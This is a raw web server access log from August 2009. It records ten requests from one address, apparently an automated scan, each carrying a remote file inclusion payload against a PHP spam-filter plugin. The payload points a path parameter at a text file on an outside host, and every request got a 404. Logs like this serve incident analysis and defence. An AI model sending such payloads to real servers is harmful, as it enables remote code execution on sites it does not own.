203.236.100.30 - - [12/Aug/2009:07:43:43 -0400] "GET /plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
203.236.100.30 - - [12/Aug/2009:07:43:43 -0400] "GET /logs/error_log.Q109062800/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
203.236.100.30 - - [12/Aug/2009:07:43:43 -0400] "GET /logs/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
203.236.100.30 - - [12/Aug/2009:07:43:43 -0400] "GET /logs/access_log.Q109062800/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
203.236.100.30 - - [12/Aug/2009:07:43:43 -0400] "GET /logs/error_log.Q109062800%20%20/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
203.236.100.30 - - [12/Aug/2009:07:43:43 -0400] "GET /logs/access_log.Q109062800%20%20/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
203.236.100.30 - - [12/Aug/2009:07:43:51 -0400] "GET /logs/access_log.Q109071700%20%20/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
203.236.100.30 - - [12/Aug/2009:07:43:51 -0400] "GET /logs/error_log.Q109071700%20%20/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
203.236.100.30 - - [12/Aug/2009:07:43:52 -0400] "GET /logs/error_log.Q109071500%20%20/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
203.236.100.30 - - [12/Aug/2009:07:43:55 -0400] "GET /logs/access_log.Q109071700%20%20/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
